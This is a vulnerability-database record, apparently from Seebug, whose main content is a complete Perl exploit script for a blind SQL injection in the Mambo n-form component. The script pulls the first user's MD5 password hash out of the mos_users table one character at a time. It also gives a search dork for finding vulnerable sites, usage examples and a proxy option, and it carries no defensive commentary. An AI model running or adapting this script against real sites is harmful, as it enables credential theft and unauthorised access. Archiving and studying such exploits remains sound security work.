{"href": "https://www.seebug.org/vuldb/ssvid-9991", "status": "poc", "bulletinFamily": "exploit", "modified": "2008-11-09T00:00:00", "title": "Mambo Component n-form (form_id) Blind SQL Injection Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-9991", "cvelist": [], "description": "No description provided by source.", "viewCount": 7, "published": "2008-11-09T00:00:00", "sourceData": "\n #!/usr/bin/perl\r\nuse LWP::UserAgent;\r\nuse Getopt::Long;\r\n\r\nif(!$ARGV[1])\r\n{\r\nsystem("Title Kosova Hackers Group by boom3rang"); \r\n print " \\n";\r\n print " #######################################################################\\n";\r\n print " # Mambo Component n-form(form_id) Blind SQL Injection Exploit \\n";\r\n print " # -----------------------------------------------------------\\n";\r\n print " # Author: boom3rang [www.khg-crew.ws] \\n";\r\n print " # Greetz: H!tmaN, KHG, chs, redc00de - Kosova Hackers Group\\n";\r\n print " # Site: www.khg-crew.ws\\n";\r\n print " # -----------------------------------------------------------\\n";\r\n print " # Dork : inurl:option=com_n-forms form_id \\n";\r\n print " # Usage: perl exploit.pl host path <options> \\n";\r\n print " # Example: perl exploit.pl www.host.com /path/ -a 3 \\n";\r\n print " # -----------------------------------------------------------\\n";\r\n print " # Options: \\n";\r\n print " # -a valid form id \\n";\r\n print " #######################################################################\\n";\r\n exit;\r\n}\r\n\r\nmy $host = $ARGV[0];\r\nmy $path = $ARGV[1];\r\nmy $userid = 1;\r\nmy $aid = $ARGV[2];\r\n\r\nmy %options = ();\r\nGetOptions(\\%options, "u=i", "p=s", "a=i");\r\n\r\nprint "[~] Exploiting...\\n";\r\n\r\nif($options{"u"})\r\n{\r\n $userid = $options{"u"};\r\n}\r\n\r\nif($options{"a"})\r\n{\r\n $aid = $options{"a"};\r\n}\r\n\r\nsyswrite(STDOUT, "[~] MD5-Hash: ", 14);\r\n\r\nfor(my $i = 1; $i <= 32; $i++)\r\n{\r\n my $f = 0;\r\n my $h = 48;\r\n while(!$f && $h <= 57)\r\n {\r\n if(istrue2($host, $path, $userid, $aid, $i, $h))\r\n {\r\n $f = 1;\r\n syswrite(STDOUT, chr($h), 1);\r\n }\r\n $h++;\r\n }\r\n if(!$f)\r\n {\r\n $h = 97;\r\n while(!$f && $h <= 122)\r\n {\r\n if(istrue2($host, $path, $userid, $aid, $i, $h))\r\n {\r\n $f = 1;\r\n syswrite(STDOUT, chr($h), 1);\r\n }\r\n $h++;\r\n }\r\n }\r\n}\r\n\r\nprint "\\n[~] Exploiting done\\n";\r\n\r\nsub istrue2\r\n{\r\n my $host = shift;\r\n my $path = shift;\r\n my $uid = shift;\r\n my $aid = shift;\r\n my $i = shift;\r\n my $h = shift;\r\n\r\n my $ua = LWP::UserAgent->new;\r\n my $query = "http://".$host.$path."index.php?option=com_n-forms&form_id=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h."";\r\n\r\n if($options{"p"})\r\n {\r\n $ua->proxy('http', "http://".$options{"p"});\r\n }\r\n\r\n my $resp = $ua->get($query);\r\n my $content = $resp->content;\r\n my $regexp = "Back";\r\n\r\n if($content =~ /$regexp/)\r\n {\r\n return 1;\r\n }\r\n else\r\n {\r\n return 0;\r\n }\r\n\r\n}\n ", "id": "SSV:9991", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:21:35", "reporter": "Root", "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2017-11-19T21:21:35", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T21:21:35", "rev": 2}, "vulnersScore": 0.4}, "references": []}

{}